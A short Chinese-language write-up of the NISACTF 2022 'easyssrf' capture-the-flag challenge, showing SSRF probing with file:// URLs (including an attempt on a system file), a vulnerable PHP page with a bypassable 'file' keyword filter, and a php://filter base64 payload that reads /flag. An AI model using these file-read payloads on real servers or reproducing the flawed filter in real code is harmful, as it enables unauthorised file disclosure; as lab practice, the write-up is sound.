[NISACTF 2022]easyssrf

打开题目所在的环境,发现是快照获取的工具,这里我尝试输入的是百度的网址,发现他会返回这个网站的一些基本信息 :

这个题目提示了ssrf,我们这里用file协议开始测试:

file:///etc/password

发现返回的结果是:害羞羞,试试其他路径?

然后这里可能是file协议能用但是读取不了这个文件尝试:

file:///flag

这里运行之后给了提示:

这里输入:

file:///fl4g

给了提示:

这里直接访问我们可以看到一段php代码:

php 复制代码
<?php

highlight_file(__FILE__);
error_reporting(0);

$file = $_GET["file"];
if (stristr($file, "file")){
  die("你败了.");
}

//flag in /flag
echo file_get_contents($file);

我们审计这段代码好像发现它把file协议给过滤了,然后这里我看了题解,是用filter伪协议读取根目录下的flag:

?file=php://filter/read=convert.base64-encode/resource=/flag

将得到的进行base64解码就能得到flag。

相关推荐
Wrop4 小时前
网络安全实训八(y0usef靶机渗透实例)
安全·web安全
xuan哈哈哈11 小时前
web基础—dvwa靶场(八)SQL Injection(Blind)
数据库·web安全·网络安全
go_to_hacker14 小时前
网络安全中GET和POST区别在哪?
安全·web安全
白808016 小时前
Nginx越界读取缓存漏洞(CVE-2017-7529)
安全·web安全
zqh1767364646918 小时前
注册信息安全专业人员(CISP)和网络安全的联系与区别
网络·安全·web安全
小堃学编程21 小时前
计算机网络(七) —— https协议与网络安全证书
计算机网络·web安全·https